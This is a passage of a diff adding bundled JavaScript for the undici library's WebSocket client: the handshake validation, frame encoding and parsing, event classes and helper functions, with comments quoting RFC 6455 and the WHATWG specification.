+ // (`Sec-WebSocket-Protocol`, protocol) in request’s header + // list. + for (const protocol of protocols) { + request.headersList.append('sec-websocket-protocol', protocol) + } + + // 9. Let permessageDeflate be a user-agent defined + // "permessage-deflate" extension header value. 
+ // https://github.com/mozilla/gecko-dev/blob/ce78234f5e653a5d3916813ff990f053510227bc/netwerk/protocol/websocket/WebSocketChannel.cpp#L2673 + // TODO: enable once permessage-deflate is supported + const permessageDeflate = '' // 'permessage-deflate; 15' + + // 10. Append (`Sec-WebSocket-Extensions`, permessageDeflate) to + // request’s header list. + // request.headersList.append('sec-websocket-extensions', permessageDeflate) + + // 11. Fetch request with useParallelQueue set to true, and + // processResponse given response being these steps: + const controller = fetching({ + request, + useParallelQueue: true, + dispatcher: options.dispatcher ?? getGlobalDispatcher(), + processResponse (response) { + // 1. If response is a network error or its status is not 101, + // fail the WebSocket connection. + if (response.type === 'error' || response.status !== 101) { + failWebsocketConnection(ws, 'Received network error or non-101 status code.') + return + } + + // 2. If protocols is not the empty list and extracting header + // list values given `Sec-WebSocket-Protocol` and response’s + // header list results in null, failure, or the empty byte + // sequence, then fail the WebSocket connection. + if (protocols.length !== 0 && !response.headersList.get('Sec-WebSocket-Protocol')) { + failWebsocketConnection(ws, 'Server did not respond with sent protocols.') + return + } + + // 3. Follow the requirements stated step 2 to step 6, inclusive, + // of the last set of steps in section 4.1 of The WebSocket + // Protocol to validate response. This either results in fail + // the WebSocket connection or the WebSocket connection is + // established. + + // 2. If the response lacks an |Upgrade| header field or the |Upgrade| + // header field contains a value that is not an ASCII case- + // insensitive match for the value "websocket", the client MUST + // _Fail the WebSocket Connection_. 
+ if (response.headersList.get('Upgrade')?.toLowerCase() !== 'websocket') { + failWebsocketConnection(ws, 'Server did not set Upgrade header to "websocket".') + return + } + + // 3. If the response lacks a |Connection| header field or the + // |Connection| header field doesn't contain a token that is an + // ASCII case-insensitive match for the value "Upgrade", the client + // MUST _Fail the WebSocket Connection_. + if (response.headersList.get('Connection')?.toLowerCase() !== 'upgrade') { + failWebsocketConnection(ws, 'Server did not set Connection header to "upgrade".') + return + } + + // 4. If the response lacks a |Sec-WebSocket-Accept| header field or + // the |Sec-WebSocket-Accept| contains a value other than the + // base64-encoded SHA-1 of the concatenation of the |Sec-WebSocket- + // Key| (as a string, not base64-decoded) with the string "258EAFA5- + // E914-47DA-95CA-C5AB0DC85B11" but ignoring any leading and + // trailing whitespace, the client MUST _Fail the WebSocket + // Connection_. + const secWSAccept = response.headersList.get('Sec-WebSocket-Accept') + const digest = crypto.createHash('sha1').update(keyValue + uid).digest('base64') + if (secWSAccept !== digest) { + failWebsocketConnection(ws, 'Incorrect hash received in Sec-WebSocket-Accept header.') + return + } + + // 5. If the response includes a |Sec-WebSocket-Extensions| header + // field and this header field indicates the use of an extension + // that was not present in the client's handshake (the server has + // indicated an extension not requested by the client), the client + // MUST _Fail the WebSocket Connection_. (The parsing of this + // header field to determine which extensions are requested is + // discussed in Section 9.1.) + const secExtension = response.headersList.get('Sec-WebSocket-Extensions') + + if (secExtension !== null && secExtension !== permessageDeflate) { + failWebsocketConnection(ws, 'Received different permessage-deflate than the one set.') + return + } + + // 6. 
If the response includes a |Sec-WebSocket-Protocol| header field + // and this header field indicates the use of a subprotocol that was + // not present in the client's handshake (the server has indicated a + // subprotocol not requested by the client), the client MUST _Fail + // the WebSocket Connection_. + const secProtocol = response.headersList.get('Sec-WebSocket-Protocol') + + if (secProtocol !== null && secProtocol !== request.headersList.get('Sec-WebSocket-Protocol')) { + failWebsocketConnection(ws, 'Protocol was not set in the opening handshake.') + return + } + + response.socket.on('data', onSocketData) + response.socket.on('close', onSocketClose) + response.socket.on('error', onSocketError) + + if (channels.open.hasSubscribers) { + channels.open.publish({ + address: response.socket.address(), + protocol: secProtocol, + extensions: secExtension + }) + } + + onEstablish(response) + } + }) + + return controller +} + +/** + * @param {Buffer} chunk + */ +function onSocketData (chunk) { + if (!this.ws[kByteParser].write(chunk)) { + this.pause() + } +} + +/** + * @see https://websockets.spec.whatwg.org/#feedback-from-the-protocol + * @see https://datatracker.ietf.org/doc/html/rfc6455#section-7.1.4 + */ +function onSocketClose () { + const { ws } = this + + // If the TCP connection was closed after the + // WebSocket closing handshake was completed, the WebSocket connection + // is said to have been closed _cleanly_. + const wasClean = ws[kSentClose] && ws[kReceivedClose] + + let code = 1005 + let reason = '' + + const result = ws[kByteParser].closingInfo + + if (result) { + code = result.code ?? 1005 + reason = result.reason + } else if (!ws[kSentClose]) { + // If _The WebSocket + // Connection is Closed_ and no Close control frame was received by the + // endpoint (such as could occur if the underlying transport connection + // is lost), _The WebSocket Connection Close Code_ is considered to be + // 1006. + code = 1006 + } + + // 1. 
Change the ready state to CLOSED (3). + ws[kReadyState] = states.CLOSED + + // 2. If the user agent was required to fail the WebSocket + // connection, or if the WebSocket connection was closed + // after being flagged as full, fire an event named error + // at the WebSocket object. + // TODO + + // 3. Fire an event named close at the WebSocket object, + // using CloseEvent, with the wasClean attribute + // initialized to true if the connection closed cleanly + // and false otherwise, the code attribute initialized to + // the WebSocket connection close code, and the reason + // attribute initialized to the result of applying UTF-8 + // decode without BOM to the WebSocket connection close + // reason. + fireEvent('close', ws, CloseEvent, { + wasClean, code, reason + }) + + if (channels.close.hasSubscribers) { + channels.close.publish({ + websocket: ws, + code, + reason + }) + } +} + +function onSocketError (error) { + const { ws } = this + + ws[kReadyState] = states.CLOSING + + if (channels.socketError.hasSubscribers) { + channels.socketError.publish(error) + } + + this.destroy() +} + +module.exports = { + establishWebSocketConnection +} + + +/***/ }), + +/***/ 9188: +/***/ ((module) => { + +"use strict"; + + +// This is a Globally Unique Identifier unique used +// to validate that the endpoint accepts websocket +// connections. 
+// See https://www.rfc-editor.org/rfc/rfc6455.html#section-1.3 +const uid = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11' + +/** @type {PropertyDescriptor} */ +const staticPropertyDescriptors = { + enumerable: true, + writable: false, + configurable: false +} + +const states = { + CONNECTING: 0, + OPEN: 1, + CLOSING: 2, + CLOSED: 3 +} + +const opcodes = { + CONTINUATION: 0x0, + TEXT: 0x1, + BINARY: 0x2, + CLOSE: 0x8, + PING: 0x9, + PONG: 0xA +} + +const maxUnsigned16Bit = 2 ** 16 - 1 // 65535 + +const parserStates = { + INFO: 0, + PAYLOADLENGTH_16: 2, + PAYLOADLENGTH_64: 3, + READ_DATA: 4 +} + +const emptyBuffer = Buffer.allocUnsafe(0) + +module.exports = { + uid, + staticPropertyDescriptors, + states, + opcodes, + maxUnsigned16Bit, + parserStates, + emptyBuffer +} + + +/***/ }), + +/***/ 2611: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { webidl } = __nccwpck_require__(1744) +const { kEnumerableProperty } = __nccwpck_require__(3983) +const { MessagePort } = __nccwpck_require__(1267) + +/** + * @see https://html.spec.whatwg.org/multipage/comms.html#messageevent + */ +class MessageEvent extends Event { + #eventInit + + constructor (type, eventInitDict = {}) { + webidl.argumentLengthCheck(arguments, 1, { header: 'MessageEvent constructor' }) + + type = webidl.converters.DOMString(type) + eventInitDict = webidl.converters.MessageEventInit(eventInitDict) + + super(type, eventInitDict) + + this.#eventInit = eventInitDict + } + + get data () { + webidl.brandCheck(this, MessageEvent) + + return this.#eventInit.data + } + + get origin () { + webidl.brandCheck(this, MessageEvent) + + return this.#eventInit.origin + } + + get lastEventId () { + webidl.brandCheck(this, MessageEvent) + + return this.#eventInit.lastEventId + } + + get source () { + webidl.brandCheck(this, MessageEvent) + + return this.#eventInit.source + } + + get ports () { + webidl.brandCheck(this, MessageEvent) + + if (!Object.isFrozen(this.#eventInit.ports)) { 
+ Object.freeze(this.#eventInit.ports) + } + + return this.#eventInit.ports + } + + initMessageEvent ( + type, + bubbles = false, + cancelable = false, + data = null, + origin = '', + lastEventId = '', + source = null, + ports = [] + ) { + webidl.brandCheck(this, MessageEvent) + + webidl.argumentLengthCheck(arguments, 1, { header: 'MessageEvent.initMessageEvent' }) + + return new MessageEvent(type, { + bubbles, cancelable, data, origin, lastEventId, source, ports + }) + } +} + +/** + * @see https://websockets.spec.whatwg.org/#the-closeevent-interface + */ +class CloseEvent extends Event { + #eventInit + + constructor (type, eventInitDict = {}) { + webidl.argumentLengthCheck(arguments, 1, { header: 'CloseEvent constructor' }) + + type = webidl.converters.DOMString(type) + eventInitDict = webidl.converters.CloseEventInit(eventInitDict) + + super(type, eventInitDict) + + this.#eventInit = eventInitDict + } + + get wasClean () { + webidl.brandCheck(this, CloseEvent) + + return this.#eventInit.wasClean + } + + get code () { + webidl.brandCheck(this, CloseEvent) + + return this.#eventInit.code + } + + get reason () { + webidl.brandCheck(this, CloseEvent) + + return this.#eventInit.reason + } +} + +// https://html.spec.whatwg.org/multipage/webappapis.html#the-errorevent-interface +class ErrorEvent extends Event { + #eventInit + + constructor (type, eventInitDict) { + webidl.argumentLengthCheck(arguments, 1, { header: 'ErrorEvent constructor' }) + + super(type, eventInitDict) + + type = webidl.converters.DOMString(type) + eventInitDict = webidl.converters.ErrorEventInit(eventInitDict ?? 
{}) + + this.#eventInit = eventInitDict + } + + get message () { + webidl.brandCheck(this, ErrorEvent) + + return this.#eventInit.message + } + + get filename () { + webidl.brandCheck(this, ErrorEvent) + + return this.#eventInit.filename + } + + get lineno () { + webidl.brandCheck(this, ErrorEvent) + + return this.#eventInit.lineno + } + + get colno () { + webidl.brandCheck(this, ErrorEvent) + + return this.#eventInit.colno + } + + get error () { + webidl.brandCheck(this, ErrorEvent) + + return this.#eventInit.error + } +} + +Object.defineProperties(MessageEvent.prototype, { + [Symbol.toStringTag]: { + value: 'MessageEvent', + configurable: true + }, + data: kEnumerableProperty, + origin: kEnumerableProperty, + lastEventId: kEnumerableProperty, + source: kEnumerableProperty, + ports: kEnumerableProperty, + initMessageEvent: kEnumerableProperty +}) + +Object.defineProperties(CloseEvent.prototype, { + [Symbol.toStringTag]: { + value: 'CloseEvent', + configurable: true + }, + reason: kEnumerableProperty, + code: kEnumerableProperty, + wasClean: kEnumerableProperty +}) + +Object.defineProperties(ErrorEvent.prototype, { + [Symbol.toStringTag]: { + value: 'ErrorEvent', + configurable: true + }, + message: kEnumerableProperty, + filename: kEnumerableProperty, + lineno: kEnumerableProperty, + colno: kEnumerableProperty, + error: kEnumerableProperty +}) + +webidl.converters.MessagePort = webidl.interfaceConverter(MessagePort) + +webidl.converters['sequence'] = webidl.sequenceConverter( + webidl.converters.MessagePort +) + +const eventInit = [ + { + key: 'bubbles', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'cancelable', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'composed', + converter: webidl.converters.boolean, + defaultValue: false + } +] + +webidl.converters.MessageEventInit = webidl.dictionaryConverter([ + ...eventInit, + { + key: 'data', + converter: webidl.converters.any, + defaultValue: null + }, 
+ { + key: 'origin', + converter: webidl.converters.USVString, + defaultValue: '' + }, + { + key: 'lastEventId', + converter: webidl.converters.DOMString, + defaultValue: '' + }, + { + key: 'source', + // Node doesn't implement WindowProxy or ServiceWorker, so the only + // valid value for source is a MessagePort. + converter: webidl.nullableConverter(webidl.converters.MessagePort), + defaultValue: null + }, + { + key: 'ports', + converter: webidl.converters['sequence'], + get defaultValue () { + return [] + } + } +]) + +webidl.converters.CloseEventInit = webidl.dictionaryConverter([ + ...eventInit, + { + key: 'wasClean', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'code', + converter: webidl.converters['unsigned short'], + defaultValue: 0 + }, + { + key: 'reason', + converter: webidl.converters.USVString, + defaultValue: '' + } +]) + +webidl.converters.ErrorEventInit = webidl.dictionaryConverter([ + ...eventInit, + { + key: 'message', + converter: webidl.converters.DOMString, + defaultValue: '' + }, + { + key: 'filename', + converter: webidl.converters.USVString, + defaultValue: '' + }, + { + key: 'lineno', + converter: webidl.converters['unsigned long'], + defaultValue: 0 + }, + { + key: 'colno', + converter: webidl.converters['unsigned long'], + defaultValue: 0 + }, + { + key: 'error', + converter: webidl.converters.any + } +]) + +module.exports = { + MessageEvent, + CloseEvent, + ErrorEvent +} + + +/***/ }), + +/***/ 5444: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { maxUnsigned16Bit } = __nccwpck_require__(9188) + +/** @type {import('crypto')} */ +let crypto +try { + crypto = __nccwpck_require__(6113) +} catch { + +} + +class WebsocketFrameSend { + /** + * @param {Buffer|undefined} data + */ + constructor (data) { + this.frameData = data + this.maskKey = crypto.randomBytes(4) + } + + createFrame (opcode) { + const bodyLength = this.frameData?.byteLength ?? 
0 + + /** @type {number} */ + let payloadLength = bodyLength // 0-125 + let offset = 6 + + if (bodyLength > maxUnsigned16Bit) { + offset += 8 // payload length is next 8 bytes + payloadLength = 127 + } else if (bodyLength > 125) { + offset += 2 // payload length is next 2 bytes + payloadLength = 126 + } + + const buffer = Buffer.allocUnsafe(bodyLength + offset) + + // Clear first 2 bytes, everything else is overwritten + buffer[0] = buffer[1] = 0 + buffer[0] |= 0x80 // FIN + buffer[0] = (buffer[0] & 0xF0) + opcode // opcode + + /*! ws. MIT License. Einar Otto Stangvik */ + buffer[offset - 4] = this.maskKey[0] + buffer[offset - 3] = this.maskKey[1] + buffer[offset - 2] = this.maskKey[2] + buffer[offset - 1] = this.maskKey[3] + + buffer[1] = payloadLength + + if (payloadLength === 126) { + buffer.writeUInt16BE(bodyLength, 2) + } else if (payloadLength === 127) { + // Clear extended payload length + buffer[2] = buffer[3] = 0 + buffer.writeUIntBE(bodyLength, 4, 6) + } + + buffer[1] |= 0x80 // MASK + + // mask body + for (let i = 0; i < bodyLength; i++) { + buffer[offset + i] = this.frameData[i] ^ this.maskKey[i % 4] + } + + return buffer + } +} + +module.exports = { + WebsocketFrameSend +} + + +/***/ }), + +/***/ 1688: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { Writable } = __nccwpck_require__(2781) +const diagnosticsChannel = __nccwpck_require__(7643) +const { parserStates, opcodes, states, emptyBuffer } = __nccwpck_require__(9188) +const { kReadyState, kSentClose, kResponse, kReceivedClose } = __nccwpck_require__(7578) +const { isValidStatusCode, failWebsocketConnection, websocketMessageReceived } = __nccwpck_require__(5515) +const { WebsocketFrameSend } = __nccwpck_require__(5444) + +// This code was influenced by ws released under the MIT license. 
+// Copyright (c) 2011 Einar Otto Stangvik +// Copyright (c) 2013 Arnout Kazemier and contributors +// Copyright (c) 2016 Luigi Pinca and contributors + +const channels = {} +channels.ping = diagnosticsChannel.channel('undici:websocket:ping') +channels.pong = diagnosticsChannel.channel('undici:websocket:pong') + +class ByteParser extends Writable { + #buffers = [] + #byteOffset = 0 + + #state = parserStates.INFO + + #info = {} + #fragments = [] + + constructor (ws) { + super() + + this.ws = ws + } + + /** + * @param {Buffer} chunk + * @param {() => void} callback + */ + _write (chunk, _, callback) { + this.#buffers.push(chunk) + this.#byteOffset += chunk.length + + this.run(callback) + } + + /** + * Runs whenever a new chunk is received. + * Callback is called whenever there are no more chunks buffering, + * or not enough bytes are buffered to parse. + */ + run (callback) { + while (true) { + if (this.#state === parserStates.INFO) { + // If there aren't enough bytes to parse the payload length, etc. 
+ if (this.#byteOffset < 2) { + return callback() + } + + const buffer = this.consume(2) + + this.#info.fin = (buffer[0] & 0x80) !== 0 + this.#info.opcode = buffer[0] & 0x0F + + // If we receive a fragmented message, we use the type of the first + // frame to parse the full message as binary/text, when it's terminated + this.#info.originalOpcode ??= this.#info.opcode + + this.#info.fragmented = !this.#info.fin && this.#info.opcode !== opcodes.CONTINUATION + + if (this.#info.fragmented && this.#info.opcode !== opcodes.BINARY && this.#info.opcode !== opcodes.TEXT) { + // Only text and binary frames can be fragmented + failWebsocketConnection(this.ws, 'Invalid frame type was fragmented.') + return + } + + const payloadLength = buffer[1] & 0x7F + + if (payloadLength <= 125) { + this.#info.payloadLength = payloadLength + this.#state = parserStates.READ_DATA + } else if (payloadLength === 126) { + this.#state = parserStates.PAYLOADLENGTH_16 + } else if (payloadLength === 127) { + this.#state = parserStates.PAYLOADLENGTH_64 + } + + if (this.#info.fragmented && payloadLength > 125) { + // A fragmented frame can't be fragmented itself + failWebsocketConnection(this.ws, 'Fragmented frame exceeded 125 bytes.') + return + } else if ( + (this.#info.opcode === opcodes.PING || + this.#info.opcode === opcodes.PONG || + this.#info.opcode === opcodes.CLOSE) && + payloadLength > 125 + ) { + // Control frames can have a payload length of 125 bytes MAX + failWebsocketConnection(this.ws, 'Payload length for control frame exceeded 125 bytes.') + return + } else if (this.#info.opcode === opcodes.CLOSE) { + if (payloadLength === 1) { + failWebsocketConnection(this.ws, 'Received close frame with a 1-byte body.') + return + } + + const body = this.consume(payloadLength) + + this.#info.closeInfo = this.parseCloseBody(false, body) + + if (!this.ws[kSentClose]) { + // If an endpoint receives a Close frame and did not previously send a + // Close frame, the endpoint MUST send a Close frame in 
response. (When + // sending a Close frame in response, the endpoint typically echos the + // status code it received.) + const body = Buffer.allocUnsafe(2) + body.writeUInt16BE(this.#info.closeInfo.code, 0) + const closeFrame = new WebsocketFrameSend(body) + + this.ws[kResponse].socket.write( + closeFrame.createFrame(opcodes.CLOSE), + (err) => { + if (!err) { + this.ws[kSentClose] = true + } + } + ) + } + + // Upon either sending or receiving a Close control frame, it is said + // that _The WebSocket Closing Handshake is Started_ and that the + // WebSocket connection is in the CLOSING state. + this.ws[kReadyState] = states.CLOSING + this.ws[kReceivedClose] = true + + this.end() + + return + } else if (this.#info.opcode === opcodes.PING) { + // Upon receipt of a Ping frame, an endpoint MUST send a Pong frame in + // response, unless it already received a Close frame. + // A Pong frame sent in response to a Ping frame must have identical + // "Application data" + + const body = this.consume(payloadLength) + + if (!this.ws[kReceivedClose]) { + const frame = new WebsocketFrameSend(body) + + this.ws[kResponse].socket.write(frame.createFrame(opcodes.PONG)) + + if (channels.ping.hasSubscribers) { + channels.ping.publish({ + payload: body + }) + } + } + + this.#state = parserStates.INFO + + if (this.#byteOffset > 0) { + continue + } else { + callback() + return + } + } else if (this.#info.opcode === opcodes.PONG) { + // A Pong frame MAY be sent unsolicited. This serves as a + // unidirectional heartbeat. A response to an unsolicited Pong frame is + // not expected. 
+ + const body = this.consume(payloadLength) + + if (channels.pong.hasSubscribers) { + channels.pong.publish({ + payload: body + }) + } + + if (this.#byteOffset > 0) { + continue + } else { + callback() + return + } + } + } else if (this.#state === parserStates.PAYLOADLENGTH_16) { + if (this.#byteOffset < 2) { + return callback() + } + + const buffer = this.consume(2) + + this.#info.payloadLength = buffer.readUInt16BE(0) + this.#state = parserStates.READ_DATA + } else if (this.#state === parserStates.PAYLOADLENGTH_64) { + if (this.#byteOffset < 8) { + return callback() + } + + const buffer = this.consume(8) + const upper = buffer.readUInt32BE(0) + + // 2^31 is the maxinimum bytes an arraybuffer can contain + // on 32-bit systems. Although, on 64-bit systems, this is + // 2^53-1 bytes. + // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Errors/Invalid_array_length + // https://source.chromium.org/chromium/chromium/src/+/main:v8/src/common/globals.h;drc=1946212ac0100668f14eb9e2843bdd846e510a1e;bpv=1;bpt=1;l=1275 + // https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/js-array-buffer.h;l=34;drc=1946212ac0100668f14eb9e2843bdd846e510a1e + if (upper > 2 ** 31 - 1) { + failWebsocketConnection(this.ws, 'Received payload length > 2^31 bytes.') + return + } + + const lower = buffer.readUInt32BE(4) + + this.#info.payloadLength = (upper << 8) + lower + this.#state = parserStates.READ_DATA + } else if (this.#state === parserStates.READ_DATA) { + if (this.#byteOffset < this.#info.payloadLength) { + // If there is still more data in this chunk that needs to be read + return callback() + } else if (this.#byteOffset >= this.#info.payloadLength) { + // If the server sent multiple frames in a single chunk + + const body = this.consume(this.#info.payloadLength) + + this.#fragments.push(body) + + // If the frame is unfragmented, or a fragmented frame was terminated, + // a message was received + if (!this.#info.fragmented || (this.#info.fin && 
this.#info.opcode === opcodes.CONTINUATION)) { + const fullMessage = Buffer.concat(this.#fragments) + + websocketMessageReceived(this.ws, this.#info.originalOpcode, fullMessage) + + this.#info = {} + this.#fragments.length = 0 + } + + this.#state = parserStates.INFO + } + } + + if (this.#byteOffset > 0) { + continue + } else { + callback() + break + } + } + } + + /** + * Take n bytes from the buffered Buffers + * @param {number} n + * @returns {Buffer|null} + */ + consume (n) { + if (n > this.#byteOffset) { + return null + } else if (n === 0) { + return emptyBuffer + } + + if (this.#buffers[0].length === n) { + this.#byteOffset -= this.#buffers[0].length + return this.#buffers.shift() + } + + const buffer = Buffer.allocUnsafe(n) + let offset = 0 + + while (offset !== n) { + const next = this.#buffers[0] + const { length } = next + + if (length + offset === n) { + buffer.set(this.#buffers.shift(), offset) + break + } else if (length + offset > n) { + buffer.set(next.subarray(0, n - offset), offset) + this.#buffers[0] = next.subarray(n - offset) + break + } else { + buffer.set(this.#buffers.shift(), offset) + offset += next.length + } + } + + this.#byteOffset -= n + + return buffer + } + + parseCloseBody (onlyCode, data) { + // https://datatracker.ietf.org/doc/html/rfc6455#section-7.1.5 + /** @type {number|undefined} */ + let code + + if (data.length >= 2) { + // _The WebSocket Connection Close Code_ is + // defined as the status code (Section 7.4) contained in the first Close + // control frame received by the application + code = data.readUInt16BE(0) + } + + if (onlyCode) { + if (!isValidStatusCode(code)) { + return null + } + + return { code } + } + + // https://datatracker.ietf.org/doc/html/rfc6455#section-7.1.6 + /** @type {Buffer} */ + let reason = data.subarray(2) + + // Remove BOM + if (reason[0] === 0xEF && reason[1] === 0xBB && reason[2] === 0xBF) { + reason = reason.subarray(3) + } + + if (code !== undefined && !isValidStatusCode(code)) { + return null + } 
+ + try { + // TODO: optimize this + reason = new TextDecoder('utf-8', { fatal: true }).decode(reason) + } catch { + return null + } + + return { code, reason } + } + + get closingInfo () { + return this.#info.closeInfo + } +} + +module.exports = { + ByteParser +} + + +/***/ }), + +/***/ 7578: +/***/ ((module) => { + +"use strict"; + + +module.exports = { + kWebSocketURL: Symbol('url'), + kReadyState: Symbol('ready state'), + kController: Symbol('controller'), + kResponse: Symbol('response'), + kBinaryType: Symbol('binary type'), + kSentClose: Symbol('sent close'), + kReceivedClose: Symbol('received close'), + kByteParser: Symbol('byte parser') +} + + +/***/ }), + +/***/ 5515: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { kReadyState, kController, kResponse, kBinaryType, kWebSocketURL } = __nccwpck_require__(7578) +const { states, opcodes } = __nccwpck_require__(9188) +const { MessageEvent, ErrorEvent } = __nccwpck_require__(2611) + +/* globals Blob */ + +/** + * @param {import('./websocket').WebSocket} ws + */ +function isEstablished (ws) { + // If the server's response is validated as provided for above, it is + // said that _The WebSocket Connection is Established_ and that the + // WebSocket Connection is in the OPEN state. + return ws[kReadyState] === states.OPEN +} + +/** + * @param {import('./websocket').WebSocket} ws + */ +function isClosing (ws) { + // Upon either sending or receiving a Close control frame, it is said + // that _The WebSocket Closing Handshake is Started_ and that the + // WebSocket connection is in the CLOSING state. 
+ return ws[kReadyState] === states.CLOSING +} + +/** + * @param {import('./websocket').WebSocket} ws + */ +function isClosed (ws) { + return ws[kReadyState] === states.CLOSED +} + +/** + * @see https://dom.spec.whatwg.org/#concept-event-fire + * @param {string} e + * @param {EventTarget} target + * @param {EventInit | undefined} eventInitDict + */ +function fireEvent (e, target, eventConstructor = Event, eventInitDict) { + // 1. If eventConstructor is not given, then let eventConstructor be Event. + + // 2. Let event be the result of creating an event given eventConstructor, + // in the relevant realm of target. + // 3. Initialize event’s type attribute to e. + const event = new eventConstructor(e, eventInitDict) // eslint-disable-line new-cap + + // 4. Initialize any other IDL attributes of event as described in the + // invocation of this algorithm. + + // 5. Return the result of dispatching event at target, with legacy target + // override flag set if set. + target.dispatchEvent(event) +} + +/** + * @see https://websockets.spec.whatwg.org/#feedback-from-the-protocol + * @param {import('./websocket').WebSocket} ws + * @param {number} type Opcode + * @param {Buffer} data application data + */ +function websocketMessageReceived (ws, type, data) { + // 1. If ready state is not OPEN (1), then return. + if (ws[kReadyState] !== states.OPEN) { + return + } + + // 2. 
Let dataForEvent be determined by switching on type and binary type: + let dataForEvent + + if (type === opcodes.TEXT) { + // -> type indicates that the data is Text + // a new DOMString containing data + try { + dataForEvent = new TextDecoder('utf-8', { fatal: true }).decode(data) + } catch { + failWebsocketConnection(ws, 'Received invalid UTF-8 in text frame.') + return + } + } else if (type === opcodes.BINARY) { + if (ws[kBinaryType] === 'blob') { + // -> type indicates that the data is Binary and binary type is "blob" + // a new Blob object, created in the relevant Realm of the WebSocket + // object, that represents data as its raw data + dataForEvent = new Blob([data]) + } else { + // -> type indicates that the data is Binary and binary type is "arraybuffer" + // a new ArrayBuffer object, created in the relevant Realm of the + // WebSocket object, whose contents are data + dataForEvent = new Uint8Array(data).buffer + } + } + + // 3. Fire an event named message at the WebSocket object, using MessageEvent, + // with the origin attribute initialized to the serialization of the WebSocket + // object’s url's origin, and the data attribute initialized to dataForEvent. + fireEvent('message', ws, MessageEvent, { + origin: ws[kWebSocketURL].origin, + data: dataForEvent + }) +} + +/** + * @see https://datatracker.ietf.org/doc/html/rfc6455 + * @see https://datatracker.ietf.org/doc/html/rfc2616 + * @see https://bugs.chromium.org/p/chromium/issues/detail?id=398407 + * @param {string} protocol + */ +function isValidSubprotocol (protocol) { + // If present, this value indicates one + // or more comma-separated subprotocol the client wishes to speak, + // ordered by preference. The elements that comprise this value + // MUST be non-empty strings with characters in the range U+0021 to + // U+007E not including separator characters as defined in + // [RFC2616] and MUST all be unique strings. 
+ if (protocol.length === 0) { + return false + } + + for (const char of protocol) { + const code = char.charCodeAt(0) + + if ( + code < 0x21 || + code > 0x7E || + char === '(' || + char === ')' || + char === '<' || + char === '>' || + char === '@' || + char === ',' || + char === ';' || + char === ':' || + char === '\\' || + char === '"' || + char === '/' || + char === '[' || + char === ']' || + char === '?' || + char === '=' || + char === '{' || + char === '}' || + code === 32 || // SP + code === 9 // HT + ) { + return false + } + } + + return true +} + +/** + * @see https://datatracker.ietf.org/doc/html/rfc6455#section-7-4 + * @param {number} code + */ +function isValidStatusCode (code) { + if (code >= 1000 && code < 1015) { + return ( + code !== 1004 && // reserved + code !== 1005 && // "MUST NOT be set as a status code" + code !== 1006 // "MUST NOT be set as a status code" + ) + } + + return code >= 3000 && code <= 4999 +} + +/** + * @param {import('./websocket').WebSocket} ws + * @param {string|undefined} reason + */ +function failWebsocketConnection (ws, reason) { + const { [kController]: controller, [kResponse]: response } = ws + + controller.abort() + + if (response?.socket && !response.socket.destroyed) { + response.socket.destroy() + } + + if (reason) { + fireEvent('error', ws, ErrorEvent, { + error: new Error(reason) + }) + } +} + +module.exports = { + isEstablished, + isClosing, + isClosed, + fireEvent, + isValidSubprotocol, + isValidStatusCode, + failWebsocketConnection, + websocketMessageReceived +} + + +/***/ }), + +/***/ 4284: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { webidl } = __nccwpck_require__(1744) +const { DOMException } = __nccwpck_require__(1037) +const { URLSerializer } = __nccwpck_require__(685) +const { getGlobalOrigin } = __nccwpck_require__(1246) +const { staticPropertyDescriptors, states, opcodes, emptyBuffer } = __nccwpck_require__(9188) +const { + kWebSocketURL, + kReadyState, 
+ kController, + kBinaryType, + kResponse, + kSentClose, + kByteParser +} = __nccwpck_require__(7578) +const { isEstablished, isClosing, isValidSubprotocol, failWebsocketConnection, fireEvent } = __nccwpck_require__(5515) +const { establishWebSocketConnection } = __nccwpck_require__(5354) +const { WebsocketFrameSend } = __nccwpck_require__(5444) +const { ByteParser } = __nccwpck_require__(1688) +const { kEnumerableProperty, isBlobLike } = __nccwpck_require__(3983) +const { getGlobalDispatcher } = __nccwpck_require__(1892) +const { types } = __nccwpck_require__(3837) + +let experimentalWarned = false + +// https://websockets.spec.whatwg.org/#interface-definition +class WebSocket extends EventTarget { + #events = { + open: null, + error: null, + close: null, + message: null + } + + #bufferedAmount = 0 + #protocol = '' + #extensions = '' + + /** + * @param {string} url + * @param {string|string[]} protocols + */ + constructor (url, protocols = []) { + super() + + webidl.argumentLengthCheck(arguments, 1, { header: 'WebSocket constructor' }) + + if (!experimentalWarned) { + experimentalWarned = true + process.emitWarning('WebSockets are experimental, expect them to change at any time.', { + code: 'UNDICI-WS' + }) + } + + const options = webidl.converters['DOMString or sequence or WebSocketInit'](protocols) + + url = webidl.converters.USVString(url) + protocols = options.protocols + + // 1. Let baseURL be this's relevant settings object's API base URL. + const baseURL = getGlobalOrigin() + + // 1. Let urlRecord be the result of applying the URL parser to url with baseURL. + let urlRecord + + try { + urlRecord = new URL(url, baseURL) + } catch (e) { + // 3. If urlRecord is failure, then throw a "SyntaxError" DOMException. + throw new DOMException(e, 'SyntaxError') + } + + // 4. If urlRecord’s scheme is "http", then set urlRecord’s scheme to "ws". + if (urlRecord.protocol === 'http:') { + urlRecord.protocol = 'ws:' + } else if (urlRecord.protocol === 'https:') { + // 5. 
